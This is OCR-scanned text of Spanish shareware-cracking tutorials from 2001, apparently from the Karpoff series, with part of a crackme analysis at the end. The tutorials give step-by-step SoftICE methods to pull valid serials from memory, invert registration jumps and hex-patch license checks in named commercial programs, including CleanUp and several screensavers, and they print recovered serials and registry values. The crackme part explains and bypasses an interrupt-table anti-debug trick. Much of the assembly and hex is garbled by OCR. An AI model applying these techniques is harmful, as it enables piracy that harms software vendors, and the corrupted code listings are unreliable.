OK! y saltaremos inmediatamente al SOFTICE , damos F12 mas o menos 11 veces hasta que caemos en este parte del 


codigo: 


:004BED9B 8B55F8 mov edx, dword ptr [ebp-08] <-------- caemos aqui 
:004BED9E 8B45FC mov eax, dword ptr [ebp-04] <----------- DAMOS D EDX 
:004BEDA 1 E82AFDFFFEF call 004BEADO 

:004BEDA6 8D55FO0 lea edx, dword ptr [ebp-10] 

:004BEDA9 E85294F4FF call 00408200 

:004BEDAE 33CO0 xor eax, eax 

:004BEDBO 5A pop edx 

:004BEDB1 59 pop ecx 

:004BEDB2 59 pop ecX <ommmmmmmmmn DAMOS D ECX 

:004BEDB3 648910 mov dword ptr fs:[eax], edx 

:004BEDB6 6894FA4BO0O0 push 004BFA94 


:004BEDBB 8B45F4 mov eax, dword ptr [ebp-0C] 

:004BEDBE 8B55F0 mov edx, dword ptr [ebp-10] <=omomomooo=- DAMOS D EAX 
:004BEDC1 E8D24FF4FF call 00403D98 

:004BEDC6 0F851F010000 ¡ne 004BEEEB 

:004BEDCC 8B45F0 mov eax, dword ptr [ebp-10] 


saltamos a esta parte del COUEO FF FEEREFREREEREAAE ES A 


:004BF67F E81447F4FF call 00403D98 < DAMOS D EDX 


:004BF684 750A ¡ne 004BF690 < DAMOS R FL Z 


OK una vez puesto el codigo ahora va la explicacion de todo esto, como podemos ver caemos en la direccion 
004BED9B damos EFl0 una sola vez y caemos en :004BED9E posicionados ahi damos D EDX y podremos ver nuestro 


nombre !!!mmmm !!! interesante vamos por buen camino.....ok continuamos traceando con F10 hasta llegar a 
004BEDB2 damos D ECX y podremos ver algo muy inetresante......unos NUMETOS........ 417478292 .....mmmmm sera el numero de 


004BEDBE damos D EAX y vemos que aparece nuestro numero falso...mmmm...vamos muy bien....jejejejejeje.....sigamos traceando 
hacia abajo....hasta que llegamos a la direccion 004BF67F en la cual damos D EDX y vemos la ventana de datos y nos aperecen unos 


numero extraños 1X2K1-T562F-U0O87C-6R4U8 .......... y asi consecutivamente abajo aparecen varios....mmmmmm!!!!! OK! tomemos un 
lapiz y un papel los apuntamos...pero esperen .......... no salgan de SOFTICE ya que como pueden ver abajo de la direccion 004BF67F hay 
un salto condicional .... mmmmm JEJEJEJEJE!!!! .... que les parece si damos F10 una sola vez para pocisionarnos en la direccion de 


memoria 004BF684 ya estando ahi , ponemos en la ventana de comandos R FL Z ahora damos enter y despues borramos todos los break 
points con BC* y despues damos CONTRO D para salir del SOFTICE y que sorpresa nos aparece una ventana como esta: 


¡Welcome 


all Pp ahte 


This copy has been licensed to : 


profesorx | 


jejejejejejje creo que no fue necesario el numero de serie....... 3) ...ahora ya vieron como registramos el programa sin 
tener que meter ningun serial, R FL Z se usa para cambiar el sentido de los saltos, en este caso cuando nos 
posicionamos en el salto nos marca asi JUMP y con esa instruccion lo cambiamos a que no 
salte.....jejejejjejejjej,.............. ahora si queremos ver si funciona nuestro serial, debemos de buscar el archivo WIN.INI 
y borrar las siguientes lineas 


[WB] 
Owner=profesorx 


Registered=True 


para volver a ser usuario sin registrar......,,,1Insertamos nuestro numero y nombre y!!!!! funciona!!!!!! 


JEJEJEJEJEJE!!!!:D) CREO QUE ESTE ARROZ YA SE COCIO OTRA VEZ mas ....... PROGRAMA 
CRACKEADO....... 


Nota 


Recuerden que este metodo es una forma mas para registrara un programa y encontrar un numero de serie, si probaran con 
otros sharewarecitos de esta empresa es lo mismo..... Espero que les sirva de algo este tutorial para aumentar sus 
conocimientos en el arte del cracking....Soy humano y cometo errores, si encuentras uno házmelo saber OK. PROFESOR_X 


Saludos 


e Act MAgO 
e ¡TeD 

e VluGo 

e [DeK_0iN ] 
e Txeli 

e Kuato_Thor 
e CrkViz 

+ CODE_MEX 
e Metamorfer 
e Txotxo 

e Raziel 


e Turbop 


e Karpoff http://welcome.to/karpoff 


e Xasx de TNT! http://www.tntcrackers. ws 


e Viper ( creador de file insPEctor ) file insPEctor web site http:/ /www.finspec. swsites. net/ index. htm 


e Toda la people de TUTORIALES2000. 


e Saludos a todos los crackers del mundo. 


Chao!! 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 
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Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 


Clean UP 
Serial. 
Buscar un Numero de Serie valido 
Newbie 
http://www.worldlynx.net/pgerhart/ 
Softice 
Profesor_X FECHA: 20/02/2001 
INTRODUCCION 


Hola amigos otro programa mas que analizamos, en este tutorial veremos como encontrar un numero de serie para todos los 
sharewares de la empresa Paul Gerhart software, que verdaderamente es una proteccion de las faciles que he 
encontrado....jeeeje... WAKE UP.estos chavos de PAul Gerhart necesitan urgentemente alguien que les implemente una 
protección eficaz...;).....el programa que usaremos de ejemplo sera el llamado CleanUp v 1.9,....ya veran por que les digo que 
es super facil encontrar un serial.....jejejje...:) 


AL ATAKE 


Comentario del Programa 


e Una utileria para eleminar archivos no deseados en tu pc 


Lo que nos interesa...el programa es shareware con libre uso de 30 días, ....jejejjejeje, el programa tiene las 


siguientes protecciones: 


ACEPTA NUMERO DE SERIE Y LIMITE DE TIEMPO 


Objetivos 


1. Buscar un numero de serie para registrarnos 


Manos a la Obra 


Antes de abrir el programa lo analizamos con file insPEctor v4.0 el que nos mostrará información realmente 
importante a la hora de atacar el programa; bueno el file insPEctor nos mostrará los siguientes datos: 


e El programa está desarrollado en Microsoft Visual C++ V 5.0 
e No esta Empacado 


A continuación... cerramos file insPEctor v4.0 y abrimos CleanUp inmediatamente entramos al programa : 


CicanUp 


ahora vamos al menu file/register y nos aparecera la siguiente ventana : 


¡Registenmg 


en la cual insertare un nombre y codigo falso, ok! ahora damos click en el boton VALIDATE MY CODE y nos 
mada el mensaje '' NAME / CODE MIS-MATCH TRY AGAIN " 


ya vieron es una MESSAGE BOX , interesante , ok ahora den click en aceptar y otra vez inserten un name y codigo 
falso y antes de dar validate code, den CONTROL D y pongan un break point en MESAGEBOXA , vuelvan a dar 
CONTROL D y ahora si den click en el boton de VALIDATE MY CODE y saltamos directamente al soft 
ice.....damos f 12 una vez y aparece la MESAGEBOXA del programa diciendonos que error en el codigo, damos click 
en el boton de esa ventana y volmemos a saltar a el softice una vez ahi en la ventana de comandos ponemos: 

S 0 L FFFFFFFF "PROFESORX" <--- lo que esta entre comillas es el name que introducimos.. 


damos [enter] y vemos la ventana de datos y aparece nuestro name,mmmmm....:) bajamos unas tres lines en la 
ventana de datos y nos encontramos algo como esto: 


ACF4671C 


lo apuntamos y vamos a la opcion de register metemos el name y esos numeros presumiblemente nuestro codigo 


ya vieron que facil fue sacar el serial, y asi es para todos los productos de esta empresa....deberas que esta 


empresa necesita urgentemente un sistema de proteccion mas eficiente....;).... 
JEJEJEJEJEJE!!!!:D) CREO QUE ESTE ARROZ YA SE COCIO OTRA VEZ...... PROGRAMA 
CRACKEADO....... 

Nota 


Recuerden que este metodo es la forma mas burda pero funcional apra encontrar un numero de serie, si probaran con otros 
sharewarecitos verian cuantos se pueden crackear con este metodo, Espero que les sirva de algo este tutorial para 
aumentar sus conocimientos en el arte del cracking....Soy humano y cometo errores, si encuentras uno házmelo saber 
OK. PROFESOR_X 


Saludos 


e. Act MAgO 
e [DeK_OiN ] 


e Txeli 


e Kuato_Thor 
e CrkViz 

e CODE_MEX 
e Metamorfer 
e Txotxo 

e Raziel 

e Turbop 


e Karpoff http://welcome.to/karpoff 


e Xasx de TNT! http://www.tntcrackers. ws 


e Viper ( creador de file insPEctor ) file insPEctor web site http:/ /www.finspec. swsites. net/ index. htm 


e Toda la people de TUTORIALES2000. 


e Saludos a todos los crackers del mundo. 


Chao!! 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 
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Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 


Life Explosion Millenium Edition Screensaver v 6.1 


Serial. 


Buscar un Numero de Serie valido 


Newbie 
http://www.controlzed.com/areality/ 


Softice 


Profesor_X FECHA: 20/02/2001 


INTRODUCCION 


Hola Amigos otro programa mas que analizamos, en este tutorial veremos como encontrar un 
numero de serie a Life Explosion Millenium Edition v 6.1 Screensaver, una empresa que se 
especializa en desarrollar Screensaver para windows, ........ como podran ver aumente una nueva 
seccion que se llama : VALORACION DEL SOFTWARE en la cual pondremos la calificacion que se 
merece segun mi punto de vista, tomando en cuenta los siguientes parametros: 


1. sistema de proteccion 


2. Funcionalidad 


3. Calidad en programación 


AL ATAKE 


Comentario del Programa 


e Un Screensaver verdaderamente bueno, unos efectos que a mi parecer son buenos. ...deberias de tenerlo....) 


Objetivos 


1. Buscar un numero de serie para registrarnos 


Manos a la Obra 


Ahora lo primero es analizar con que esta hecho el Life Explosion Millenium Edition v 6.1 Screensaver que desde 


ahora lo llamaremos LEM, lo analizaremos con una utileria muy buena que se llama Language 2000 v4.5.1.144 el que 
nos mostrará información realmente importante para la hora de atacar el programa; bueno el Language 2000 
v4.5.1.144 nos mostrará los siguientes datos: 


é CAWINDOWSLife_Explosion_ME.scr 


[Life_Explosion_ME.scr 
check for new version at http: //controlzed.c 
A 


¡Life Explosion 


empezemos,iniciemos el 
SoftICE e instalemos el programa y nos vamos a control panel > screensaver y seleccionamos el LEM y vamos a 
la opcion de configurar y nos aprecera esta ventana: 


Register reminder 


Already regisered? 


mmmm....como podemos ver nos aparece en la parte inferior de la ventana unas caption box en las cuales insertaremos 
nuestro nombre y numero de serie como se ve en la pantalla, y damos click en SUBMIT y nos aparece una ventanita 
como esta: 


¡Something strange... 


ok!!! ahora damos click en cancelar y como podemos ver tiene aspecto de una MESSAGEBOX mmmmmm!! ok! 
ahora demos CONTROL D y saltamos al SOFTICE en el cual pondremos un break point en BPX MESSAGEBOXA 
y volvemos a dar CONTROL D y ahora si regresamos a la ventana del LEM y damos click en SUBMIT y saltamos 
inmediatamente al SOFTICE damos F12 una sola vez y saltamos a la ventana de error, damos click en el boton de 
cancelar y saltamos otra vez al SOFTICE en el cual caemos en el codigo siguiente: 


:0040B73E ES5D8A0BOO Call 004C41A0 


:0040B743 83F804 cmp eax, 00000004 <--caemos aqui veran que facil 
:0040B746 7403 je 0040B74B 

:0040B748 48 dec eax 

:0040B749 752C jne 0040B777 


ok!!!! una vez ahi enpesamos a ver lo que contiene los acumuladores y cuando damos D ESP , vemos la ventana de 
datos y nos damos cuenta de unos numeritos como estos remarcados en rojo en la direccion de memorial virtual: 


016£:0077f4ES 0089 0012 1545 1548 1222 2222 ........ 0002030 


| Congratulations! 


y donde diablos se grabo nuestro numero de registro....... mmmmm..buena pregunta...pues se guardo en el reg edit en la 
siguiente seccion: 


[HKEY_CURRENT_USERSoftwareWControl-Zed GroupWMLife Explosion] 
"InstallDir"="C:WArchivos de programaWControl ZedWLife Explosion" 
"RegisteredTo"="profesor x" 

"RegistrationKey"="0002030" 


si borramos los valores de RegisteredTo y RegistrationKey volveremos a ser usuarios no registrados..... 


Nota 


Espero que les sirva de algo este tutorial para aumentar sus conocimientos en el arte del cracking....Soy humano y cometo 
errores, si encuentras uno házmelo saber OK. PROFESOR _X 


Saludos 


e Act MAgO 
e. ¡TeD 

e VluGo 

+ [DeK_OiN ] 
e Txeli 

e Kuato_Thor 
e CrkViz 

+ CODE_MEX 
e Metamorfer 
e Txotxo 

e Raziel 


e Turbop 


e Karpoff http://welcome.to/karpoff 


e Xasx de TNT! http://www.tntcrackers. ws 


e Viper ( creador de file insPEctor ) file insPEctor web site http:/ /www.finspec. swsites. net/ index. htm 


e Toda la people de TUTORIALES2000. 


e Saludos a todos los crackers del mundo. 


Chao!! 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 
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Programa: — Rippling Water Screensaver v 2.1 


PROTECCION: Serial. 

Objetivo: parchar el Programa para ser usuario registrado 

Descripcion: Un Screensaver verdaderamente bueno, unos efectos que a mi parecer son excelentes 
Dificultad: Newbie 

DOWNLOAD: http://www.controlzed.com/areality/ 

Herramientas: Softice 

CRACKER: Profesor_X FECHA: 20/02/2001 


INTRODUCCION 


Hola Amigos otro programa mas que analizamos, en este tutorial veremos como parchar el Rippling 
Water Screensaver v 2.1, de la empresa Ambient reality software una empresa que se especializa en 
desarrollar Screensaver para windows, ........como podran ver aumente una nueva seccion que se 
llama : VALORACION DEL SOFTWARE en la cual pondremos la calificacion que se merece segun mi 
punto de vista, tomando en cuenta los siguientes parametros: 


1. sistema de proteccion 
2. Funcionalidad 
3. Calidad en programación 


AL ATAKE 


Ahora lo primero es analizar con que esta hecho el Rippling Water Screensaver v 2.1 que desde ahora lo 
llamaremos RWS, lo analizaremos con una utileria muy buena que se llama Language 2000 v4.5.1.144 el que nos 
mostrará información realmente importante para la hora de atacar el programa; bueno el Language 2000 v4.5.1.144 
nos mostrará los siguientes datos: 


$ CAWINDOWSRippling_Water. scr 


SoftICE e instalemos el programa y nos vamos a control panel > screensaver y seleccionamos el RWS y vamos a 
la opcion de configurar y nos aparecera esta ventana: 


Ripping Water Screen Saver - UNREGISTEREDI! 


Enero 31, 16:1239. 


mmmm....como podemos ver nos aparece en la parte inferior de la ventana un STRING que dice PLEASE 
REGISTER...mmmmm.. demos click en esa seccion y nos mada a la siguiente ventana : 


Jur tegistrabon service use a VeriSign pei Se 
transactions. VeniSi a deprime 
cure transactions and ma soy Erro on pe 


cediicales companias. 
, of this means that your credl card information is sent to the credk 
card processor in a very secure manmes, s0 that NOBODY cansec it. 


ok ahora en las caption box insertamos nuestro nombre y cualquier numero de serie, despues de eso damos click en 
SUBMIT y nos manda el mensaje de error : 


ok ahora damos click en aceptar e 
os otra vez nuestros datos pero antes de dar click damos CONTROLD y saltamos al SOFTICE y ponemos 
un break point en BPPX MESSAGEBOXA ok! damos CONTROL D otra vez y regresamos al programa , ahora si 
damos click en SUBMIT y saltamos inmediatamente al SOFTICE damos F12 una sola vez y caemos en la siguiente 
parte del codigo: 


:0040A3D4 FF7510 push [ebp+10] 

:0040A3D7 FF750C push [ebp+0C] 

:0040A3DA FF7508 push [ebp+08] 

:0040A3DD ES8D2010000 call 0040A5B4 <--llamada que nos interesa 
:0040A3E2 83C40C add esp, 0000000C 

:0040A3E5 85CO0 test eax, eax 

:0040A3E7 7524 ¡ne 0040A40D 

:0040A3E9 6A00 push 00000000: 


CAEMOS AQUI 
:0040A3FE 8B55B8 mov edx, dword ptr [ebp-48] 
:0040A401 64891500000000 mov dword ptr fs:[00000000], edx 
:0040A408 E9A2010000 ¡mp 0040 ASAF 


ok!!!! una vez ahi subimos unas cuantas lineas y podemos ver una salto JNZ y dos lineas arriba una CALL 
...mmmmm!!! interesante......... ok!! borremos todos los break points y pongamos un nuevo break point en 0040A3DD 
y regresamos al programa insertamos los datos nuevamente damos clik en SUBMIT y caemos directamente en esa 
direccion de memoria, como en este tutorial hablaremos de como parcharlo..les dejo de tarea buscar el serial siguiendo 
esa CALL, ok ! continuemos,.. damos F8 para posicionarnos en la primera instruccion que ejecutara esa CALL y 
caemos aqui: 


:0040A5B4 55 push ebp <----- caemos aqui 
:0040A5B5 SBEC mov ebp, esp 

:0040A5B7 81C4FSFEFFFE add esp, FFFFFEFS 
:0040A5BD C745F821000000 mov [ebp-08], 00000021 
:0040A5C4 33C0 xor eax, eax 

:0040A5C6 8945FC mov dword ptr [ebp-04], eax 
:0040A5C9 EB10 ¡mp 0040A5DB 


ok ahora como podemos ver esa es la llamada que se encarga de verificar el numero de serie , si es verdadero manda 
valor en EAX = 1, si no mandan un valor en EAX = 0, ok!! lo que hariamos es modificar esas instrucciones que llaman 
esa call para que mande EAX con valor de 1, mmmmm.... abrimos una copia del RWS en el editor hexadecimal y nos 
vamos al offset 9BBA y cambiaremos: 


00009BB2|5DC3 FEFF FFC7 45F8 
00009BC0/2100 0000 33C0 8945 FCEB 108B 550C|!.,.3.. 
Y) FCOF BEO4 0A01 45F8 FF45 FCFF 1. 


FEFF FFC7 45F8 
2100 0000 3300 8945 FCEB 108B 550C 


NOTA: para todos los que estan en las nubes......lo que hicimos fue cambiar las instrucciones : 
b801000000 "HEXADECIMAL" 

es igual a 

MOV EAX,001 " INSTRUCCION EN ENSAMBLADOR" 

C3 "hexadecimal" 

es igual a 

RET "INSTRUCCION EN ENSAMBLADOR" 


DESPUES DE ESTA NOTA AHORA SI PODEMOS DECIR.... 


Nota 


Espero que les sirva de algo este tutorial para aumentar sus conocimientos en el arte del cracking....Soy humano y cometo 
errores, si encuentras uno házmelo saber OK. PROFESOR _X 


Saludos 


e. Act MAgO 
e. ¡TeD 

e VluGo 

+ [DeK_OiN ] 
e Txeli 

e Kuato_Thor 
e CrkViz 

+ CODE_MEX 
e Metamorfer 
e Txotxo 

e Raziel 


e Turbop 


e Karpoff http://welcome.to/karpoff 


e Xasx de TNT! http://www. tntcrackers. ws 


e Viper ( creador de file insPEctor ) file insPEctor web site http:/ /www.finspec. swsites. net/ index. htm 


e Toda la people de TUTORIALES2000. 


e Saludos a todos los crackers del mundo. 


Chao!! 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 
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INTRODUCCION 


Si tuviera que elegir una palabra para definir este crackme sería: "DIDÁCTICO". 

Ni2, en su afán por enseñarnos, ha creado este crackme que, como él dice, "Si no tienes ni idea sobre como un depurador funciona y sobre nociones basicas de Windows 
(con respecto al SEH), este crackme te sera imposible resolverlo." Y es completamente cierto. Así que lo primero que hay que hacer es documentarse sobre el tema. Al 
final os doy algunos links a las fuentes de información que he consultado. 


Algunas observaciones: 

En el leeme.txt que acompaña al crackme, Ni2 nos dice que no es necesaria la fuerza bruta. Bueno, esto no es del todo cierto, ya que para pasar el primer test de nuestro 
serial entran en juego cuatro caracteres del serial que con un pequeño "FB" y algo de intuición, sale rápidamente. 

También dice que no lleva protección Anti-Nada... tampoco es cierto. Hay una zona de código que redirecciona la INT 1 (usada por SICE) y por lo tanto al llegar aquí hay 
que hacerle un bypass para poder seguir trazando : 


AL ATAKE 


Después de conseguir abundante información sobre el modo de depuración del 386 y sobre el "Manejo Estructurado de 
Excepciones" ("Structured Exception Handling" (SEH)) de Windows, desensamblamos el programa con IDA (siguiendo el consejo 
de Ni2 en su txt) y pronto nos damos cuenta de las zonas de código interesantes. 


Por ejemplo: 


00401320 BB 28 13 40 00 mov ebx, offset dword_401328 

00401325 FF E3 jmp ebx ; Indirect Near Jump 

00401327 OF db OFh 

00401328 OF 23 F8 BF dword_401328 dd OBFF8230Fh ; DATA XREF: .text:00401320 
0040132C 74 12 40 00 dd offset dword_401272+2 


Si habeis leído el txt del crackme vereis que Ni2 dice que ha ofuscado una instrucción. Pues está aquí, en 401328. Con IDA nos 
ponemos en esa dirección le decimos que "undefine" la zona 401328-40132F y luego en 401328 le decimos a IDA que eso es 
código. Este es el resultado: 


00401320 BB 28 13 40 00 mov ebx, offset loc_401328 
00401325 FF E3 jmp ebx ; Indirect Near Jump 


00401327 OF db OFh ; Ni2 Malo 

00401328 loc_401328: ; DATA XREF: .text:00401320 
00401328 OF 23 F8 mov dr7, eax 

0040132B BF 74 12 40 00 mov edi, offset dword_401274 


Como veis había ocultado la carga del registro DR7 (Debug Control Register) 


Otra zona curiosa es esta: 


00401272 5A db 5Ah ; Z 

00401273 5A db 5Ah ; Z 

00401274 8E 73 14 8F A6 98+ db 8Eh, 73h, 14h, 8Fh, 0A6h, 98h, 6, 5Fh, 1Eh, 89h, 44h 
00401274 06 5F 1E 89 44 F4+ ; DATA XREF: .text:0040132B.Oo 

00401274 4F 57 5D 2D 3E 5A+ ; .text:00401360.0 

00401274 46 5E 5D 52 59 5A+ db 0F4h, 4Fh, 57h, 5Dh, 2Dh, 3Eh, 5Ah, 46h, 5Eh, 5Dh, 52h 
00401274 3D 2A 34 4D 5B 4A+ db 59h, 5Ah, 3Dh, 2Ah, 34h, 4Dh, 5Bh, 4Ah, 5Bh, 53h, 48h 
00401274 5B 53 48 5C€ 50 1F+ db 5Ch, 50h, 1Fh, 51h, 71h, 7Ch, 77h, 76h, 71h, 38h, 3Fh 
00401274 51 71 7C 77 76 71+ db 67h, 7Ch, 75h, 77h, 30h, 3%h, 4Dh, 70h, 6Bh, 39h, “Eh 
00401274 38 3F 67 7C 75 77+ db 71h, 71h, 6Eh, 34h, 77h, 71h, G6Eh, 34h, 7YEh, 3Eh, 7Dh 
00401274 30 39 4D 70 6B 39+ db 71h, 7Dh, 6Bh, 7Eh, 73h, 7Ah, 6Ch, 39h, 75h, 71h, 7Ah 
00401274 7F 71 71 6E 34 77+ db 39h, 43h, 76h, 70h, 7Dh, 7Bh, 68h, 6Dh, 3%h, 63h, 70h 
00401274 71 6E 34 7E 3E 7D+ db 6Ch, 72h, 34h, 25h, 37h, 19h, OACh, 87h, OCh, 5%h, 14h 
00401274 71 7D 6B 7E 73 7A+ db 4Fh, 74h, 19h, OB5h, 8Ah, 3Eh, 5%h, 14h, OE0h, OCEh 
00401274 6C 39 75 71 7A 39+ db 7Dh, 9Bh, 1Ah, 1Eh, 19h, 14h, 1Fh, 8Eh, 9Ah, ODOh, 1Bh 
004012EC 6A 00 push O 
004012EE E8 1D 01 00 00 call 3j_PostQuitMessage ; Call Procedure 
004012F3 EB 17 jmp short loc_40130C ; Jump 


Aquí también tenemos que jugar un poquito con IDA para que nos muestre bien la zona 401274-4012EB, son 120 (78h) bytes 


encriptados que como podreis suponer, los que conoceis las "artes" de N12, contiene el código que nos mostrará el mensajito de 
CRACKME RESOLVED !!! 


Bien, vamos a analizar lo que hace este programa desde el principio: 


00401000 6A 00 public start 
00401000 start proc near 
00401000 push O 


00401002 E8 27 04 00 00 call 3j_GetModuleHandleA ; Call Procedure 
00401007 A3 AO 20 40 00 mov dword_4020A0, eax 

0040100C E8 90 03 00 00 call sub_4013A1 ; Call Procedure 
00401011 E8 B2 01 00 00 call sub_4011C8 ; Call Procedure 
00401016 6A 00 push 0 

00401018 68 35 10 40 00 push offset sub_401035 

0040101D 6A 00 push O 

0040101F 68 00 20 40 00 push offset aMydialog ; "MyDialog" 
00401024 FF 35 AO 20 40 00 push dword_4020A0 

0040102A E8 C3 03 00 00 call j_DialogBoxParamA ;¿ Call Procedure 
0040102F 50 push eax 

00401030 E8 F3 03 00 00 call 3_ExitProcess ; Call Procedure 
00401030 start endp 


Este es el programa principal. Después de la típica llamada a GetModuleHandle se llama a una rutina en 4013A1 que comprueba 
si estamos ejecutándolo bajo Windows 9x ó ME y nos dará un error en caso contrario. 


A continuación se llama a la rutina que hay en 401108. 
Esto es lo que hace: 


004011C8 60 pusha ; Push all General Registers 
004011C9 52 push edx 

004011CA OF 01 4C 24 FE sidt [esp-2] ; Store Interrupt Descriptor Table Register 
004011CF 5A pop edx 

004011D0 83 C2 0C add edx, 0OCh ; Add 

004011D3 8B 1A mov ebx, [edx] 

004011D5 66 8B 5A FC mov bx, [edx-4] 

004011D9 89 1D 99 20 40 00 mov dword_402099, ebx 
004011DF BF OE 13 40 00 mov edi, offset loc_40130E 
004011E4 66 89 7A FC mov [edx-4], di 

004011E8 C1 CF 10 ror edi, 10h ; Rotate Right 
004011EB 66 89 7A 02 mov [edx+2], di 

004011Er 61 popa ; Pop all General Registers 
004011F0 C3 retn ; Return Near from Procedure 


Lo primero significativo que vemos es que guarda el descriptor de la tabla de interrupciones, este descriptor son 6 bytes, los 
cuatro primeros que se guardan son la dirección base de la tabla de interrupciones y los otros 2 bytes son el límite de dicha tabla. 


¿Por qué se guarda en ESP-2? Para que la siguiente instrucción POP EDX recupere la dirección base de dicha tabla (el límite es 
descartado) 


Aquí teneis como queda la pila después de esta instrucción: 


EDI=815FE9C4 EBP=0063FF"78 ESP=0063FE14 EIP=004011CF od Is zapc 
cs=014F Ds=0157 Sss=0157 ES=0157 FS=30F7 GS=0000 


byte PROT (0) 
0157:0063FE04 FF FF FF FF 80 EF 5F 81-77 42 F7 BF 00 FA FF 02 ...... WBirs ss 
->0157:0063FE14 00 00 OA 80 C4 E9 5F 81-F4 3D 60 81 78 FF 63 00 ...... O E O 
0157:0063FE24 38 FE 63 00 00 00 00 00-CO ED 5F 81 AO 0A 62 81 8.C....... b 


ESP apunta a donde está guardada la dirección base de la tabla de registros: 800A0000 


Si miramos ahora esa zona de memoria, vemos lo siguiente: 


0157:800A0000 84 8A 28 00 00 8E 2F C9-94 8A 28 00 00 EE 2F C9 ..(.../...(.../. 
0157:800A0010 EA EC 28 00 00 8E 03 CO-AZ 8A 28 00 00 EE 2F C9 ..(....... (ai 
0157:800A0020 B4 8A 28 00 00 EE 2F C9-C4 8A 28 00 00 EE 2F C9 ..(.../...(.../. 


y 


Esta es la tabla de interrupciones. Su formato es: 


INTERRUPT DESCRIPTOR 


== GAMER. OR 
INTERRUPT *$N -- 


IDT REGISTER | | ] 


INTERRUPT $1 -- 
LS 0 


O IDT LIMIT ----- + | | | | 
Y | -- GATE FOR 
INTERRUPT $0 -- 
| IDT BASE —------=---- >| | | | 
HZ O + $ 
==-=-- + 
SL 0 


Cada entrada de la tabla tiene esta forma: 


80386 INTERRUPT GATE 
SL 23 15 Ñ 


OFFSET 31..16 pb. PDBLJO" dd: de 000: 0 
0; (NOT USED) ¡4 
A A a a a a a e a a a a a a a a a a a e a ii a ad ii $ —= => == a A A O A O O O O O O O O O A O O O O O O 


SELECTOR OFFSET 15..0 


Como se puede apreciar, cada entrada de la tabla ocupa 8 bytes que forman un descriptor para cada una de las interrupciones. El 
offset a la rutina de servicio de cada interrupción está dividido en dos mitades. Volviendo a nuestra tabla: 


0157:800A0000 84 8A 28 00 00 8E 2F C9-94 8A 28 00 00 EE 2F C9 ..(.../...(.../. 


Y aplicando lo anterior, vemos que el offset a la INT 1 es: c92F8A94. El código que resta de esta rutina lo que hace es cargar ese 
valor en EBX y guardarlo en la variable que se encuentra en 402099 

Después sustituye el offset a la INT 1 por la dirección 40130E (que por supuesto está dentro del crackme3) Es decir, a partir de 
ahora cada vez que se produzca una INT 1 se ejecutará su rutina de servicio que está en 40130E. Es debido a esto lo que os decía 
antes de que sí que hay una pequeña protección Anti-Traza que debemos saltar para poder seguir trazando. Una de las soluciones a 
esto puede ser: 


Cuando estemos en 4011E4 (antes de ejecutarla) cambios EIP a 4011EF con lo que no modificamos el valor que tenía el offset a 
INT 1. Y seguimos... 


A la vuelta de esta rutina, el programa presenta el DialogBox y no hace nada especial que no sea esperar a que algún "pardillo" 
intente meter un Serial correcto. 


Para saltarnos esto metemos un BPX GetDlgltemTextA, le damos a F5 para salir de SICE y metemos un Serial. Si analizais el 
código vereis que se esperan 16 caracteres (10h) en 401142, aunque sólo 12 de ellos (los 12 primeros) se usan luego. 


Al darle al botón Register actúa el BreakPoint y aparecemos en SICE. Le damos a F12 para volver de la API y estamos aquí: 


004011F1 60 pusha ; Push all General Registers 
004011F2 BF 6D 20 40 00 mov edi, offset word_40206D 


En EDI tenemos la dirección del Serial: 


0157:0040206D 54 48 45 4C 41 4D 45 52-4E 49 44 4F 00 00 00 00 THELAMERNIDO.... 
(Para los impacientes: Éste es bueno ;) 


Luego se calcula la longitud en EDI. 


004011F7 33 CO xor eax, eax ;¿ Logical Exclusive OR 

004011F9 AE scasb ; Compare String 

004011FA 75 FD jnz short loc_4011F9 ; Jump if Not Zero (ZF=0) 

004011FC 4F dec edi ; Decrement by 1 

004011FD 81 EF 6D 20 40 00 sub edi, offset word_40206D ; Integer Subtraction 
00401203 83 FF 0C cmp edi, OCh ; Compare Two Operands 

00401206 73 06 jnb short loc_40120E ; Jump if Not Below (CF=0) 


La longitud se compara con 12 (0Ch) y si es menor debería echarnos. Digo "debería" porque aquí se le coló un bug a N12 :) (que ya 
ha corregido) y la instrucción siguiente tendría que ser jmp 4012F5 y NO 3z 4012F5 porque de esta forma se cuelan los Serials de 
menos de 12 caracteres. 


00401208 OF 84 E7 00 00 00 3z loc_4012F5 ; Jump if Zero (ZF=1) 
0040120E loc_40120E: ; CODE XREF: sub_4011F1+15.]3 


Si el Serial pasa el test de longitud, se cogen los caracteres n*s 9,10,11 y 12 y se hace una serie de sencillas operaciones con ellos 
que no voy a explicar. El resultado estará en EAX. 


0040120E 81 2D 75 20 40 00+ sub dword_402075, 30303030h ; Integer Subtraction 

00401218 B8 54 26 54 41 mov eax, 41542654h ; 'AT8£T' Publicidad encubierta ;) 

0040121D 0F B7 1D 75 20 40+ movzx ebx, word ptr dword_402075 ; Move with Zero-Extend 
00401224 8B CB mov ecx, ebx 

00401226 C1 E3 10 shl ebx, 10h ; Shift Logical Left 

00401229 0B CB or ecx, ebx ;¿ Logical Inclusive OR 

0040122B 33 C1 xor eax, ecx ; Logical Exclusive OR 

0040122D OF B7 1D 77 20 40+ movzx ebx, word ptr dword_402075+2 ; Move with Zero-Extend 
00401234 8B CB mov ecx, ebx 

00401236 C1 E3 10 shl ebx, 10h ; Shift Logical Left 


00401239 0B CB or ecx, ebx ;¿ Logical Inclusive OR 
0040123B 03 Cl add eax, ecx ¡; Add 


Después de dichos cálculos, EAX debe valer 775E5ESEh para poder continuar. Éste es el primer test que debe pasar el serial 


(quitando el de la longitud). 


0040123D 3D 5E 5E 5E 77 cmp eax, 7TI75E5E5Eh ; Compare Two Operands 
00401242 0F 85 AD 00 00 00 j3jnz loc_4012F5 ; Jump if Not Zero (ZF=0) 


